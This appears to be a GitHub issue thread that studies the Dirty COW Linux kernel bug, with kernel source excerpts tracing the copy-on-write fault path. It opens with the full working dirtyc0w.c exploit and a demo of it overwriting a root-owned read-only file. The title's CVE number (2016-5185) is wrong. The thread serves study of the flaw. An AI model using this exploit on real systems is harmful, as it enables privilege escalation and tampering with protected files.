c - Dirty Cow (CVE-2016-5185)

nixawk commented 7 years ago

#
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}

int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

References

nixawk commented 7 years ago

When a user-space process calls [mmap] to map device memory into its address space,
the system responds by creating a new VMA to represent that mapping. A driver that
supports mmap (and, thus, that implements the mmap method) needs to help that
process by completing the initialization of that VMA. The driver writer should, therefore,
have at least a minimal understanding of VMAs in order to support mmap.

Let’s look at the most important fields in struct vm_area_struct (defined in <linux/
mm.h>). These fields may be used by device drivers in their mmap implementation.
Note that the kernel maintains lists and trees of VMAs to optimize area lookup, and
several fields of [vm_area_struct] are used to maintain this organization.

nixawk commented 7 years ago

MADV_DONTNEED

The region is no longer needed. The kernel may free these pages, causing any changes to the 
pages to be lost, as well as swapped out pages to be discarded.

nixawk commented 7 years ago

/proc/self/mem

/proc/$pid/mem shows the contents of $pid's memory mapped the same way as in the process, 
i.e., the byte at offset x in the pseudo-file is the same as the byte at address x in the process. If an 
address is unmapped in the process, reading from the corresponding offset in the file returns EIO 
(Input/output error).  /proc/self/mem points to it's own memory.

REG("mem",       S_IRUSR|S_IWUSR, proc_mem_operations),

static const struct file_operations proc_mem_operations = {
    .llseek     = mem_lseek,
    .read       = mem_read,
    .write      = mem_write,
    .open       = mem_open,
    .release    = mem_release,
};

static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)
{
    struct mm_struct *mm = file->private_data;
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;

    if (!mm)
        return 0;

    page = (char *)__get_free_page(GFP_TEMPORARY);
    if (!page)
        return -ENOMEM;

    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))
        goto free;

    while (count > 0) {
        int this_len = min_t(int, count, PAGE_SIZE);

        if (write && copy_from_user(page, buf, this_len)) {
            copied = -EFAULT;
            break;
        }

        this_len = access_remote_vm(mm, addr, page, this_len, write);
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }

        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }

        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;

    mmput(mm);
free:
    free_page((unsigned long) page);
    return copied;
}

/**
 * access_remote_vm - access another process' address space
 * @mm:     the mm_struct of the target address space
 * @addr:   start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @gup_flags:  flags modifying lookup behaviour
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, unsigned int gup_flags)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags);
}

References

nixawk commented 7 years ago

int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;
    int write = gup_flags & FOLL_WRITE;

    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;

        ret = get_user_pages_remote(tsk, mm, addr, 1,
                gup_flags, &page, &vma, NULL);
        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;

            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes);
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes);
            }
            kunmap(page);
            put_page(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);

    return buf - old_buf;
}

/*
 * This is the same as get_user_pages_remote(), just with a
 * less-flexible calling convention where we assume that the task
 * and mm being operated on are the current task's and don't allow
 * passing of a locked parameter.  We also obviously don't pass
 * FOLL_REMOTE in here.
 */
long get_user_pages(unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas)
{
    return __get_user_pages_locked(current, current->mm, start, nr_pages,
                       pages, vmas, NULL, false,
                       gup_flags | FOLL_TOUCH);
}

References

https://elixir.free-electrons.com/linux/v4.0.9/source/mm/gup.c#L578

nixawk commented 7 years ago

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
                        struct mm_struct *mm,
                        unsigned long start,
                        unsigned long nr_pages,
                        int write, int force,
                        struct page **pages,
                        struct vm_area_struct **vmas,
                        int *locked, bool notify_drop,
                        unsigned int flags)
{
    long ret, pages_done;
    bool lock_dropped;

    if (locked) {
        /* if VM_FAULT_RETRY can be returned, vmas become invalid */
        BUG_ON(vmas);
        /* check caller initialized locked */
        BUG_ON(*locked != 1);
    }

    if (pages)
        flags |= FOLL_GET;
    if (write)
        flags |= FOLL_WRITE;
    if (force)
        flags |= FOLL_FORCE;

    pages_done = 0;
    lock_dropped = false;
    for (;;) {
        ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
                       vmas, locked);
        if (!locked)
            /* VM_FAULT_RETRY couldn't trigger, bypass */
            return ret;

        /* VM_FAULT_RETRY cannot return errors */
        if (!*locked) {
            BUG_ON(ret < 0);
            BUG_ON(ret >= nr_pages);
        }

        if (!pages)
            /* If it's a prefault don't insist harder */
            return ret;

        if (ret > 0) {
            nr_pages -= ret;
            pages_done += ret;
            if (!nr_pages)
                break;
        }
        if (*locked) {
            /* VM_FAULT_RETRY didn't trigger */
            if (!pages_done)
                pages_done = ret;
            break;
        }
        /* VM_FAULT_RETRY triggered, so seek to the faulting offset */
        pages += ret;
        start += ret << PAGE_SHIFT;

        /*
         * Repeat on the address that fired VM_FAULT_RETRY
         * without FAULT_FLAG_ALLOW_RETRY but with
         * FAULT_FLAG_TRIED.
         */
        *locked = 1;
        lock_dropped = true;
        down_read(&mm->mmap_sem);
        ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
                       pages, NULL, NULL);
        if (ret != 1) {
            BUG_ON(ret > 1);
            if (!pages_done)
                pages_done = ret;
            break;
        }
        nr_pages--;
        pages_done++;
        if (!nr_pages)
            break;
        pages++;
        start += PAGE_SIZE;
    }
    if (notify_drop && lock_dropped && *locked) {
        /*
         * We must let the caller know we temporarily dropped the lock
         * and so the critical section protected by it was lost.
         */
        up_read(&mm->mmap_sem);
        *locked = 0;
    }
    return pages_done;
}

nixawk commented 7 years ago

/**
 * __get_user_pages() - pin user pages in memory
 * @tsk:    task_struct of target task
 * @mm:     mm_struct of target mm
 * @start:  starting user address
 * @nr_pages:   number of pages from start to pin
 * @gup_flags:  flags modifying pin behaviour
 * @pages:  array that receives pointers to the pages pinned.
 *      Should be at least nr_pages long. Or NULL, if caller
 *      only intends to ensure the pages are faulted in.
 * @vmas:   array of pointers to vmas corresponding to each page.
 *      Or NULL if the caller does not require them.
 * @nonblocking: whether waiting for disk IO or mmap_sem contention
 *
 * Returns number of pages pinned. This may be fewer than the number
 * requested. If nr_pages is 0 or negative, returns 0. If no pages
 * were pinned, returns -errno. Each page returned must be released
 * with a put_page() call when it is finished with. vmas will only
 * remain valid while mmap_sem is held.
 *
 * Must be called with mmap_sem held.  It may be released.  See below.
 *
 * __get_user_pages walks a process's page tables and takes a reference to
 * each struct page that each user address corresponds to at a given
 * instant. That is, it takes the page that would be accessed if a user
 * thread accesses the given user virtual address at that instant.
 *
 * This does not guarantee that the page exists in the user mappings when
 * __get_user_pages returns, and there may even be a completely different
 * page there in some cases (eg. if mmapped pagecache has been invalidated
 * and subsequently re faulted). However it does guarantee that the page
 * won't be freed completely. And mostly callers simply care that the page
 * contains data that was valid *at some point in time*. Typically, an IO
 * or similar operation cannot guarantee anything stronger anyway because
 * locks can't be held over the syscall boundary.
 *
 * If @gup_flags & FOLL_WRITE == 0, the page must not be written to. If
 * the page is written to, set_page_dirty (or set_page_dirty_lock, as
 * appropriate) must be called after the page is finished with, and
 * before put_page is called.
 *
 * If @nonblocking != NULL, __get_user_pages will not wait for disk IO
 * or mmap_sem contention, and if waiting is needed to pin all pages,
 * *@nonblocking will be set to 0.  Further, if @gup_flags does not
 * include FOLL_NOWAIT, the mmap_sem will be released via up_read() in
 * this case.
 *
 * A caller using such a combination of @nonblocking and @gup_flags
 * must therefore hold the mmap_sem for reading only, and recognize
 * when it's been released.  Otherwise, it must be held for either
 * reading or writing and will not be released.
 *
 * In most cases, get_user_pages or get_user_pages_fast should be used
 * instead of __get_user_pages. __get_user_pages should be used only if
 * you need some special @gup_flags.
 */
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;

    if (!nr_pages)
        return 0;

    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))
        gup_flags |= FOLL_NUMA;

    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;
        unsigned int page_increm;

        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) {
            vma = find_extend_vma(mm, start);
            if (!vma && in_gate_area(mm, start)) {
                int ret;
                ret = get_gate_page(mm, start & PAGE_MASK,
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }

            if (!vma || check_vma_flags(vma, gup_flags))
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags);
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        page = follow_page_mask(vma, start, foll_flags, &page_mask);
        if (!page) {
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking);
            switch (ret) {
            case 0:
                goto retry;
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();
        }
        if (IS_ERR(page))
            return i ? i : PTR_ERR(page);
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}

nixawk commented 7 years ago

/*
 * mmap_sem must be held on entry.  If @nonblocking != NULL and
 * *@flags does not include FOLL_NOWAIT, the mmap_sem may be released.
 * If it is, *@nonblocking will be set to 0 and -EBUSY returned.
 */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    /* For mlock, just skip the stack guard page. */
    if ((*flags & FOLL_MLOCK) &&
            (stack_guard_page_start(vma, address) ||
             stack_guard_page_end(vma, address + PAGE_SIZE)))
        return -ENOENT;
    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;
    if (nonblocking)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY;
    if (*flags & FOLL_NOWAIT)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
    if (*flags & FOLL_TRIED) {
        VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
        fault_flags |= FAULT_FLAG_TRIED;
    }

    ret = handle_mm_fault(mm, vma, address, fault_flags);
    if (ret & VM_FAULT_ERROR) {
        if (ret & VM_FAULT_OOM)
            return -ENOMEM;
        if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
            return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
        if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
            return -EFAULT;
        BUG();
    }

    if (tsk) {
        if (ret & VM_FAULT_MAJOR)
            tsk->maj_flt++;
        else
            tsk->min_flt++;
    }

    if (ret & VM_FAULT_RETRY) {
        if (nonblocking)
            *nonblocking = 0;
        return -EBUSY;
    }

    /*
     * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
     * necessary, even if maybe_mkwrite decided not to set pte_write. We
     * can thus safely do subsequent page lookups as if they were reads.
     * But only do so when looping for pte_write is futile: in some cases
     * userspace may also be wanting to write to the gotten user page,
     * which a read fault here might prevent (a readonly page might get
     * reCOWed by userspace write).
     */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags &= ~FOLL_WRITE;
    return 0;
}

References

https://elixir.free-electrons.com/linux/v4.0.9/source/mm/gup.c#L261

nixawk commented 7 years ago

The actual code that creates the COWed page is do_wp_page embedded deep in the handler, but the rough code flow can be found in the official Dirty COW page:

faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        FAULT_FLAG_WRITE && !pte_write
      do_wp_page
        PageAnon() <- this is CoWed page already
        reuse_swap_page <- page is exclusively ours
        wp_page_reuse
          maybe_mkwrite <- dirty but RO again
          ret = VM_FAULT_WRITE

nixawk commented 7 years ago

Fix: ~mem_rm~ to mem_rw

dirty-cow-threads

References

https://chao-tic.github.io/blog/2017/05/24/dirty-cow

nixawk commented 7 years ago

Kernel Driver mmap Handler Exploitation

nixawk / hello-c